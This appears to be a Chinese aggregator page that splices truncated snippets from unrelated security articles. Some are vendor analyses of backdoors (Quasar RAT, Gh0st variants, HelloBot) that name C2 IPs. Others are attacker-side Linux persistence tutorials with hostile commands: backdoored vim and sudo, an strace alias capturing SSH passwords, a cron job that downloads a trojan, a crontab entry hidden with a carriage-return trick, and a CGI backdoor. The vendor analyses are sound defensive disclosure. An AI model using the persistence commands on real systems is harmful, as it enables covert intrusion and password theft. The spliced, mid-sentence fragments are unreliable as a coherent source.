工程师溯源发现,黑客通过弱口令等方式入侵服务器后,然后通过SQL Server等服务启动cmd.exe来执行powershell脚本,最终下载运行上述后门病毒程序。...而该后门病毒疑似为Quasar RAT的变种(一款国外开源远控工具),具备了下载、执行、上传、信息获取与记录等常见的远程控制功能,对用户特别是企业单位具备严重安全威胁。...在此提醒广大用户,尤其是企业服务器管理人员,及时部署安全软件,并定时查看安全日志,对服务器进行加固,避免遭遇上述黑客、病毒攻击。火绒用户如发现异常日志记录,可随时联系我们进行排查。...附:【分析报告】 一、 详细分析 通过查询近一年的相关威胁信息后,我们得到该后门病毒的传播趋势如下图所示: 传播趋势 经代码分析对比,我们推测该后门病毒是由黑客修改Quasar RAT而来。...连接C&C服务器相关代码如下图所示: 连接C&C服务器 接收、执行后门指令相关代码如下图所示: 接收、执行后门指令 二、 溯源分析 经分析发现,我们推测该后门模块是由病毒作者修改Quasar RAT(github
近期,火绒威胁情报系统监测到一款后门病毒正在快速传播,被激活后会释放多个恶意文件并执行,使黑客可以进行信息收集,远程控制等恶意操作。...火绒安全产品可对上述病毒进行拦截查杀,请用户及时更新病毒库以进行防御。 火绒查杀图 用户点击病毒程序之后,该病毒就会释放并执行恶意文件,随后黑客可以远程控制用户电脑。...另一种情况是 look2.exe 被用于执行配置更新操作,当命令行中包含 GUpdate 和要更新的注册表项时,程序会定位到指定的位置进行配置更新: 配置更新操作 释放的 DLL 文件实际上是 Gh0st 后门病毒的变种...火绒安全实验室在 2019 年发布的《火绒5.0公测阶段就立功 有效防御某一类常见黑客攻击 》文章中披露的后门病毒在执行流程和代码逻辑上,经对比与该函数没有太大改动,故不再重复分析。...指定导出函数 该导出函数主体逻辑同样与火绒安全实验室在 2019 年发布的《火绒5.0公测阶段就立功 有效防御某一类常见黑客攻击 》 文章中提到的后门病毒,经对比并没有太大改动(DDOS 模块已移除),
当防病毒技术在不断完善的同时,病毒也在不断设法予以对抗,夹缝求生。Gh0st 后门病毒就是其中之一。...据“火绒威胁情报系统”显示, Gh0st 在国内常见的后门病毒中占比最大,超过50%。...相关代码及功能展示 相关文章链接: 供应链污染几时休:记一次排查后门病毒发现的行业乱象 第三次变种 黑灰产软件往往是病毒聚集的重灾区,Gh0st 变种也将目光瞄准了此处。...被捆绑的其它家族的感染型病毒用于掩护后门执行并加大破坏性,影响恶劣。...相关代码及功能展示 相关文章链接: 后门病毒携带蠕虫 使用多种免杀手段 第五次变种 近期火绒安全工程师在追踪 "Xidu" 组织的过程中,捕获到的多个“Xidu”变种样本, "Xidu" 团伙所使用的后门病毒实质为
该后门病毒入侵用户电脑后,还会继续实施下载勒索病毒等危害行为,甚至还通过后门病毒向用户下发消息弹窗“别杀毒了,木有用”,影响恶劣。 ?...后门病毒入侵电脑后,除了投放所述勒索病毒以外,还会记录键盘信息、收集电脑信息、执行远程文件、设置RDP服务、获取当前登陆QQ的各类信息,此外不排除黑客利用该后门病毒传播其它病毒的可能性。...附:【分析报告】 一、详细分析 近期火绒接到网友求助,在使用穿越火线游戏外挂后被勒索病毒加密全盘文件。外挂中被植入了后门病毒,勒索病毒是通过后门病毒投毒的方式进行传播。...解密执行后门病毒相关代码 被注入到svchost中的后门病毒为Gh0st后门的一个变种,运行后病毒会连接C&C服务器(116.63.147.136:6681)。...被检测的安全软件进程 二、溯源分析 除上述后门病毒之外,我们还在QQ群中找到了另一个被植入外挂程序中的后门病毒。
近期,火绒威胁情报系统监测到一批盗版软件安装包正在通过伪造的官网进行传播,其中包含后门病毒,该病毒被激活后,黑客可以执行截取屏幕图像、远程控制等恶意行为。...目前,火绒安全产品可对上述病毒进行拦截查杀,请用户及时更新病毒库以进行防御。 火绒查杀图 此次披露的后门病毒为《恶意后门利用多种免杀手段,可远控用户电脑》的升级版本。...其通过复制官网的界面,诱导用户下载盗版应用,以 Telegram 中文版为例: 伪造的官网 当用户点击安装后,该病毒会释放正常安装程序和病毒文件,随后黑客可执行包括截取受害者屏幕图像、远程控制受害者电脑等各种恶意操作...,该病毒执行流程如下所示: 病毒的执行流程图 目前,火绒收集到的盗版软件列表如下图所示: 盗版软件列表 一 样本分析 以 "x64-china.msi" 程序为例,其为伪造的 Telegram...但该 dll 里面 3 个导出函数也都指向同一个入口,执行同样的操作: 解密 DLL 及其导出函数 本次分析过程中所下载的 info.txt,其 dll 代码与此前分析的 《恶意后门利用多种免杀手段,
近期,火绒威胁情报系统监测到后门病毒伪装成“36种财会人员必备技巧(珍藏版) .rar”在微信群聊中快速传播。...火绒安全产品可对上述病毒进行拦截查杀,请用户及时更新病毒库以进行防御。...查杀图 一 样本分析 病毒执行流程,如下图所示: 病毒的执行流程 由于杀毒软件Zemana的反病毒驱动启动时,会根据注册表项HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet...: 解密执行shellcode1 在shellcode1中会从C&C服务器接收、执行shellcode2,相关代码,如下图所示: 接收、执行shellcode2 在shellcode2中会内存加载后门模块...,相关代码,如下图所示: 内存加载后门模块 该后门模块具备各种恶意功能如:键盘记录、文件窃取、远程控制等恶意功能,以下对一些较为重要的恶意代码进行举例说明, 远程控制相关代码,如下图所示: 远程控制
火绒曾多次披露外挂软件携带病毒危害用户的行为,包括木马程序收集色情信息等,甚至还有病毒作者公然在外挂程序中弹窗叫嚣“杀毒无用”…… 近日,火绒工程师再次溯源一起通过外挂软件投放后门病毒的恶性事件。...通过分析发现,该后门病毒主要通过外挂程序(文中样本文件名为 “巴哈-盗贼之海 V4.1.exe”)进行传播,并通过官网提供下载链接(hxxp://xradar.cccpan.com/)。如下图: ?...病毒执行流程和释放文件如下图: ? 病毒执行流程图 ?...火绒用户无需担心,火绒可以查杀该病毒。具体查杀步骤:(1)使用专杀工具查杀;(2)电脑重启;(3)重启后使用火绒安全软件进行病毒查杀即可。此外,火绒僵尸网络防护功能也可以成功拦截该病毒。 ?...2、相关外挂软件带毒报告链接 QQ游戏外挂收集色情文件 火绒提示切勿使用 黑客通过游戏外挂植入后门病毒 弹窗叫嚣“杀毒无用”
腾讯安全反病毒实验室就此跟进分析,对此次带有后门的XShell工具进行了分析。
近期,火绒威胁情报系统监测到一种针对Linux系统的后门型病毒,经排查分析后,确定其与HelloBot家族有关。...该病毒自2019年被披露后,被多个犯罪团伙和APT组织使用,对用户构成较大的威胁。目前,火绒安全产品可对上述病毒进行拦截查杀,请企业用户及时更新病毒库以进行防御。...病毒查杀图 该病毒被激活后,会释放“worker”文件并为其进行配置,后者在受害者电脑上执行关键操作。不同的配置会导致不同的恶意行为,包括进程伪装、备份文件、防火墙设置和远程控制等。...该病毒执行流程,如下图所示: 病毒执行流程图 一、样本分析 该类病毒是一个由配置主导的成熟复杂的后门程序,不同的配置有不同的执行结果,这里仅以当前样本配置的执行过程进行阐述: 配置查看 在观察中发现样本有四个启动参数...释放器结束任务,剩下操作移交到 firefox 代表的 worker 中: 开启 "worker" 工作者执行: 由于该样本属于后门程序的设定,所以后续操作围绕着“上线”展开。
近期,火绒发现一款名叫“安卓修改大师”的安卓应用破解软件携带后门病毒。...一、病毒危害行为详细分析 该后门病毒会与C&C服务器(154.91.164.117)通讯获取后门指令,之后针对不同的后门指令执行指定的恶意行为,包括文件操作、盗取用户信息、降低系统安全性等操作。...(一)文件操作 黑客可以通过C&C服务器控制后门病毒下载执行任意恶意程序,进而对用户造成更大的安全威胁。病毒还可以将任意文件内容上传到后门服务器,严重威胁到用户的信息安全。...1、后门病毒可以下载执行任意文件,相关代码如下图所示: 2、除下载执行外,后门病毒还可以通过虚拟映射加载的方式执行任意PE文件,如下图所示: 执行后门指令图 3、后门病毒可以读取用户电脑中的任意文件内容发送到...1、后门病毒会获取用户的QQ好友以及所添加群的好友列表,如下图所示: 窃取用户的QQ信息图 2、后门病毒会通过键盘记录和读取剪切板内容来获取用户的个人信息、密码等敏感信息,严重威胁用户的财产和信息安全
:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
一、概述 日前,火绒安全团队截获后门病毒“Humpler”。该病毒伪装成多款小工具(如:老板键、屏幕亮度调节等),正通过2345软件大全等多个知名下载站进行传播。...病毒入侵电脑后,会劫持QQ、360、搜狗等(市面上所有主流)浏览器首页。并且该后门病毒还在不断更新恶意代码,不排除未来会向用户电脑派发更具威胁性病毒的可能性。 ?...二、样本分析 近期,火绒截获到一批后门病毒样本,病毒会将自己伪装成小工具(如:超级老板键、超级变声器、屏幕亮度调节等),并会通过2345软件大全、非凡下载站、PC6下载站等多个软件下载站进行传播。...而且为了躲避安全厂商查杀,现阶段被下发的病毒模块为PE头被简化过的模块数据。截至到目前,被下发的病毒模块数据依然在持续更新,我们不排除病毒将来会下发其他病毒模块的可能性。...病毒代码位置 病毒首先会通过访问http://www.baidu.com检测当前的网络状态,如果无法正常联网,则不会运行病毒流程。如下图所示: ?
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
近期,火绒威胁情报系统检测到一种新型后门病毒伪装成常用软件,通过Google搜索引擎传播,主要针对中文用户。该病毒利用多种方式对抗杀软查杀,被运行后,黑客会立即控制受害者终端并进行任意恶意行为。...该病毒执行流程,如下图所示: 病毒执行流程 火绒工程师对该病毒进行详细分析后,发现该病毒是《后门病毒伪装成正常文件诱导点击 请保持警惕》报告中所提到的病毒的最新变种。...相关的解密代码,如下图所示: 解密后门模块 后门模块解密后将直接加载到内存中执行,而不会在磁盘上留下任何痕迹。...后门病毒伪装成正常文件诱导点击,请保持警惕》中提到的病毒的最新变种。...相关的功能代码对比,如下图所示: 功能代码对比 其他一些恶意功能如:键盘记录、文件窃取、下载执行恶意程序等恶意功能,这里不在重复赘述,请参考《后门病毒伪装成正常文件诱导点击,请保持警惕》。
%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...经过我的一番寻找,加上自己所剩无几的经验,终于找到了一个目录 /etc/update-manager/ ,这个目录我跟你说,我一眼就相中了,这简直就是为后门设计的呀 ?...后门 ?
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
近期,依托腾讯安全大数据,腾讯安全反诈骗实验室自研的TRP-AI反病毒智能引擎捕获到某色情病毒家族存在流量异常行为,腾讯安全研究人员研究发现,该色情病毒家族集成了一个名为 “隐流者”的应用刷单病毒,该病毒家族将自身植入到支付插件中...,然后利用混淆,关键信息加密,核心代码剥离,恶意代码分多次下载等技术手段来绕过传统病毒引擎查杀。...腾讯安全研究人员指出隐流者病毒家族除了隐蔽性极强的特性之外,其隐匿于用户量极大的色情和游戏进行传播可以持续获取到足够的流量来布局刷量变现平台.该病将真实用户设备改造成后门刷量客户端,然后通过云端控制的方式让中招用户完成应用市场刷量任务...根据对隐流者病毒完善的刷榜流程,安全研究人员其主要存在以下风险: 1、应用市场平台的生态安全:隐流者病毒可以绕过应用市场的虚假设备检测功能,实现对应用的快速刷取排名,影响应用市场排名的公平性; 2、应用开发者的营销损失...二、该家族的传播方式 “隐流者”将后门代码植入到名为cmnpay的恶意支付插件中,任何使用该支付插件的应用都可执行相应的恶意代码.目前该恶意支付插件主要的使用者是色情刚需应用和部分的游戏应用. ?
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi echo 'echo -e ...
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
